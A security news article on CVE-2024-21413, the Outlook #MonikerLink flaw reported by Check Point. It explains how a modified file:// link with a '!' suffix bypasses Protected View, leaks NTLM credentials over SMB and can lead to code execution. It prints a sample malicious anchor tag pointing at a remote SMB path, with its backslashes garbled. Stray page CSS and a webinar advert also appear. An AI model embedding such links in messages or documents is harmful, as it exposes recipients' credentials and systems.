New Outlook 0-day RCE Flaw Exploited in the Wild

Outlook has been discovered to have an interesting vulnerability while handling specific hyperlinks, which was found to be exploited by threat actors in the wild. This vulnerability has been assigned with CVE-2024-21413, and the severity was given as 9.8 ( Critical ).



However, Microsoft has addressed this vulnerability and fixed it as part of their Patch Tuesday release of February 2024 . Successful exploitation of this vulnerability could allow a threat actor to bypass the Office-protected view and open a file in editing mode instead of the “protected mode.”






Document

@import url('https://fonts.googleapis.com/css2?family=Poppins&display=swap');
@import url('https://fonts.googleapis.com/css2?family=Poppins&family=Roboto&display=swap');
*{
margin: 0; padding: 0;
text-decoration: none;
}
.container{
font-family: roboto, sans-serif;
width: 90%;
border: 1px solid lightgrey;
padding: 20px;
background: linear-gradient(2deg,#E0EAF1 100%,#BBD2E0 100%);
margin: 20px auto ;
border-radius: 40px 10px;
box-shadow: 5px 5px 5px #e2ebff;
}
.container:hover{
box-shadow: 10px 10px 5px #e2ebff;

}
.container .title{
color: #015689;
font-size: 22px;
font-weight: bolder;
}
.container .title{
text-shadow: 1px 1px 1px lightgrey;
}
.container .title:after {
width: 50px;
height: 2px;
content: ' ';
position: absolute;
background-color: #015689;
margin: 20px 8px;
}
.container h2{
line-height: 40px;
margin: 2px 0;
font-weight: bolder;
}
.container a{

color: #170d51;
}
.container p{
font-size: 18px;
line-height: 30px;

}

.container button{
padding: 15px;
background-color: #4469f5;
border-radius: 10px;
border: none;
background-color: #00456e ;
font-size: 16px;
font-weight: bold;
margin-top: 5px;
}
.container button:hover{
box-shadow: 1px 1px 15px #015689;
transition: all 0.2S linear;

}
.container button a{
color: white;
}
hr{
/ display: none; /
}

Live Account Takeover Attack Simulation


How do Hackers Bypass 2FA?
Live attack simulation Webinar demonstrates various ways in which account takeover can happen and practices to protect your websites and APIs against ATO attacks

.

Book Your Spot

Outlook 0-day RCE Flaw



According to the Checkpoint report, if the hyperlink starts with http:// or https://, Outlook uses Windows’s default browser to open the URL. However, if there are any other protocols like the “Skype” URL protocol, clicking on the hyperlink will display a security warning.



Microsoft Warning Notice (Source: Checkpoint)


In other cases, like the “file://” protocol, Outlook did not display a warning dialog box. Instead, it had an error message in the Windows Notification Center, and the resource that was tried to access through the link was also not accessed.



If the file was accessed, there is a high chance that the local NTLM credential information could have been leaked.



Windows Notification Center Warning Message (Source: Checkpoint)


The #MonikerLink Bug



A slight modification in the “file://” protocol link bypasses the previously shown security restriction and proceeds to access the resource. For testing purposes, the below link was used, which successfully accessed the “test.rtf” file on the remote resource.



<a href=”file:///\10.10.111.111 est est.rtf!something”>CLICK ME</a> As stated by researchers, accessing this resource uses the SMB protocol that leaks the local NTLM credential information during the process. Moreover, researchers also tried escalating this attack vector to arbitrary code execution. 



Moniker Link string uses the “look up” for COM (Component Object Model) objects on Windows. Outlook calls the ole32!MkParseDisplayName() API for doing this job. As per Microsoft’s API document for Moniker, including “!” makes it a composite moniker.



Exploitation



Researchers used this composite moniker with FileMoniker (\10.10.111.111 est est.rtf) + ItemMoniker (something) for accessing Microsoft Word. Windows runs Microsoft Word as a COM server in the background.



If the hyperlink is clicked, Word opens and parses the file “test.rtf” based on the string “\10.10.111.111 est est.rtf”. However, this test.rtf is controlled by the attacker, which was further modified to perform arbitrary code execution on the remote system using “WINWORD.EXE”.



Researchers stated this #MonikerLink bug/attack vector may be present in other software and also recommend developers check and fix the issue.



Stay updated on Cybersecurity news, Whitepapers, and Infographics. Follow us on LinkedIn & Twitter .
The post New Outlook 0-day RCE Flaw Exploited in the Wild appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform .